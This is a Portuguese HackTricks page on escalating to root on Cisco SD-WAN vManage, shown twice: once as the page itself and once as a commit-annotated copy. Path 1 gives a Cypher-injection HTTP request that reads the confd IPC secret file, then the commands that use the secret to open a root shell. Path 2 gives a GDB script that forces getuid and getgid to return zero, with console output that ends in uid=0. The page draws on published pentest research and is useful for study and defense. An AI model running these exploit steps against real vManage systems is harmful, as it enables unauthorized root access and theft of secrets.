hacktricks/linux-hardening/privilege-escalation/cisco-vmanage.md

# Cisco - vmanage

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Path 1

(Exemplo de [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))

Após investigar um pouco através de alguma [documentação](http://66.218.245.39/doc/html/rn03re18.html) relacionada ao `confd` e os diferentes binários (acessíveis com uma conta no site da Cisco), descobrimos que para autenticar o socket IPC, ele usa um segredo localizado em `/etc/confd/confd_ipc_secret`:
```
vmanage:~$ ls -al /etc/confd/confd_ipc_secret

-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
```
Lembre-se da nossa instância Neo4j? Ela está rodando sob os privilégios do usuário `vmanage`, permitindo-nos recuperar o arquivo usando a vulnerabilidade anterior:
```
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1

Host: vmanage-XXXXXX.viptela.net


[...]

"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
```
O programa `confd_cli` não suporta argumentos de linha de comando, mas chama `/usr/bin/confd_cli_user` com argumentos. Portanto, poderíamos chamar diretamente `/usr/bin/confd_cli_user` com nosso próprio conjunto de argumentos. No entanto, não é legível com nossos privilégios atuais, então temos que recuperá-lo do rootfs e copiá-lo usando scp, ler a ajuda e usá-lo para obter o shell:
```
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret

vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret

vManage:~$ /tmp/confd_cli_user -U 0 -G 0

Welcome to Viptela CLI

admin connected from 127.0.0.1 using console on vManage

vManage# vshell

vManage:~# id

uid=0(root) gid=0(root) groups=0(root)
```
## Path 2

(Exemplo de [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))

O blog¹ da equipe synacktiv descreveu uma maneira elegante de obter um shell root, mas a desvantagem é que requer obter uma cópia do `/usr/bin/confd_cli_user`, que é legível apenas pelo root. Eu encontrei outra maneira de escalar para root sem esse incômodo.

Quando desmontei o binário `/usr/bin/confd_cli`, observei o seguinte:
```
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3              mov    %rax,%rbx
40165f: bf 1c 31 40 00        mov    $0x40311c,%edi
401664: e8 17 f8 ff ff        callq  400e80 <getenv@plt>
401669: 49 89 c4              mov    %rax,%r12
40166c: 48 85 db              test   %rbx,%rbx
40166f: b8 dc 30 40 00        mov    $0x4030dc,%eax
401674: 48 0f 44 d8           cmove  %rax,%rbx
401678: 4d 85 e4              test   %r12,%r12
40167b: b8 e6 30 40 00        mov    $0x4030e6,%eax
401680: 4c 0f 44 e0           cmove  %rax,%r12
401684: e8 b7 f8 ff ff        callq  400f40 <getuid@plt>  <-- HERE
401689: 89 85 50 e8 ff ff     mov    %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff        callq  401000 <getgid@plt>  <-- HERE
401694: 89 85 44 e8 ff ff     mov    %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff     mov    -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff        callq  401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00  movb   $0x0,-0x831(%rbp)
4016ac: 48 85 c0              test   %rax,%rax
4016af: 0f 84 ad 03 00 00     je     401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00        mov    $0x3ff,%edx
4016ba: 48 89 c6              mov    %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff  lea    -0xc30(%rbp),%rdi
4016c4:   e8 d7 f7 ff ff           callq  400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
```
Quando eu executo “ps aux”, observei o seguinte (_note -g 100 -u 107_)
```
vmanage:~$ ps aux
… snipped …
root     28644  0.0  0.0   8364   652 ?        Ss   18:06   0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
```
Eu hipotetizei que o programa “confd\_cli” passa o ID do usuário e o ID do grupo que coletou do usuário logado para o aplicativo “cmdptywrapper”.

Minha primeira tentativa foi executar o “cmdptywrapper” diretamente e fornecê-lo com `-g 0 -u 0`, mas falhou. Parece que um descritor de arquivo (-i 1015) foi criado em algum lugar ao longo do caminho e não consigo falsificá-lo.

Como mencionado no blog da synacktiv (último exemplo), o programa `confd_cli` não suporta argumentos de linha de comando, mas posso influenciá-lo com um depurador e, felizmente, o GDB está incluído no sistema.

Eu criei um script GDB onde forcei a API `getuid` e `getgid` a retornar 0. Como já tenho privilégio “vmanage” através da RCE de desserialização, tenho permissão para ler o `/etc/confd/confd_ipc_secret` diretamente.

root.gdb:
```
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
```
Saída do Console:
```
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
```
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Suporte ao HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`# Cisco - vmanage`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`## Path 1`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`(Exemplo de [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Após investigar um pouco através de alguma [documentação](http://66.218.245.39/doc/html/rn03re18.html) relacionada ao `confd` e os diferentes binários (acessíveis com uma conta no site da Cisco), descobrimos que para autenticar o socket IPC, ele usa um segredo localizado em `/etc/confd/confd_ipc_secret`:
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`vmanage:~$ ls -al /etc/confd/confd_ipc_secret`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
			`-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Lembre-se da nossa instância Neo4j? Ela está rodando sob os privilégios do usuário `vmanage`, permitindo-nos recuperar o arquivo usando a vulnerabilidade anterior:
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`Host: vmanage-XXXXXX.viptela.net`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00


			`[...]`

			`"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			O programa `confd_cli` não suporta argumentos de linha de comando, mas chama `/usr/bin/confd_cli_user` com argumentos. Portanto, poderíamos chamar diretamente `/usr/bin/confd_cli_user` com nosso próprio conjunto de argumentos. No entanto, não é legível com nossos privilégios atuais, então temos que recuperá-lo do rootfs e copiá-lo usando scp, ler a ajuda e usá-lo para obter o shell:
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
			`vManage:~$ /tmp/confd_cli_user -U 0 -G 0`

			`Welcome to Viptela CLI`

			`admin connected from 127.0.0.1 using console on vManage`

			`vManage# vshell`

			`vManage:~# id`

			`uid=0(root) gid=0(root) groups=0(root)`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`## Path 2`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`(Exemplo de [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			O blog¹ da equipe synacktiv descreveu uma maneira elegante de obter um shell root, mas a desvantagem é que requer obter uma cópia do `/usr/bin/confd_cli_user`, que é legível apenas pelo root. Eu encontrei outra maneira de escalar para root sem esse incômodo.
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Quando desmontei o binário `/usr/bin/confd_cli`, observei o seguinte:
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`vmanage:~$ objdump -d /usr/bin/confd_cli`
			`… snipped …`
			`40165c: 48 89 c3 mov %rax,%rbx`
			`40165f: bf 1c 31 40 00 mov $0x40311c,%edi`
			`401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>`
			`401669: 49 89 c4 mov %rax,%r12`
			`40166c: 48 85 db test %rbx,%rbx`
			`40166f: b8 dc 30 40 00 mov $0x4030dc,%eax`
			`401674: 48 0f 44 d8 cmove %rax,%rbx`
			`401678: 4d 85 e4 test %r12,%r12`
			`40167b: b8 e6 30 40 00 mov $0x4030e6,%eax`
			`401680: 4c 0f 44 e0 cmove %rax,%r12`
			`401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE`
			`401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)`
			`40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE`
			`401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)`
			`40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi`
			`4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>`
			`4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)`
			`4016ac: 48 85 c0 test %rax,%rax`
			`4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>`
			`4016b5: ba ff 03 00 00 mov $0x3ff,%edx`
			`4016ba: 48 89 c6 mov %rax,%rsi`
			`4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi`
			`4016c4: e8 d7 f7 ff ff callq 400ea0 <ABS+0x32e9880f0b@plt>`
			`… snipped …`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Quando eu executo “ps aux”, observei o seguinte (_note -g 100 -u 107_)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`vmanage:~$ ps aux`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`… snipped …`
			`root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash`
			`… snipped …`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Eu hipotetizei que o programa “confd\_cli” passa o ID do usuário e o ID do grupo que coletou do usuário logado para o aplicativo “cmdptywrapper”.`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Minha primeira tentativa foi executar o “cmdptywrapper” diretamente e fornecê-lo com `-g 0 -u 0`, mas falhou. Parece que um descritor de arquivo (-i 1015) foi criado em algum lugar ao longo do caminho e não consigo falsificá-lo.
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			Como mencionado no blog da synacktiv (último exemplo), o programa `confd_cli` não suporta argumentos de linha de comando, mas posso influenciá-lo com um depurador e, felizmente, o GDB está incluído no sistema.
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Eu criei um script GDB onde forcei a API `getuid` e `getgid` a retornar 0. Como já tenho privilégio “vmanage” através da RCE de desserialização, tenho permissão para ler o `/etc/confd/confd_ipc_secret` diretamente.
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00
			`root.gdb:`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`set environment USER=root`
			`define root`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`finish`
			`set $rax=0`
			`continue`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`end`
			`break getuid`
			`commands`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`root`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`end`
			`break getgid`
			`commands`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`root`
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`end`
			`run`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Saída do Console:`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2020-08-25 09:31:20 +00:00			`vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli`
			`GNU gdb (GDB) 8.0.1`
			`Copyright (C) 2017 Free Software Foundation, Inc.`
			`License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>`
			`This is free software: you are free to change and redistribute it.`
			`There is NO WARRANTY, to the extent permitted by law. Type "show copying"`
			`and "show warranty" for details.`
			`This GDB was configured as "x86_64-poky-linux".`
			`Type "show configuration" for configuration details.`
			`For bug reporting instructions, please see:`
			`<http://www.gnu.org/software/gdb/bugs/>.`
			`Find the GDB manual and other documentation resources online at:`
			`<http://www.gnu.org/software/gdb/documentation/>.`
			`For help, type "help".`
			`Type "apropos word" to search for commands related to "word"...`
			`Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.`
			`Breakpoint 1 at 0x400f40`
			`Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59`
			`59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)`
			`0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59`
			`59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)`
			`0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59`
			`59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)`
			`0x0000000000401871 in ?? ()`
			`Welcome to Viptela CLI`
			`root connected from 127.0.0.1 using console on vmanage`
			`vmanage# vshell`
			`bash-4.4# whoami ; id`
			`root`
			`uid=0(root) gid=0(root) groups=0(root)`
			`bash-4.4#`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Suporte ao HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`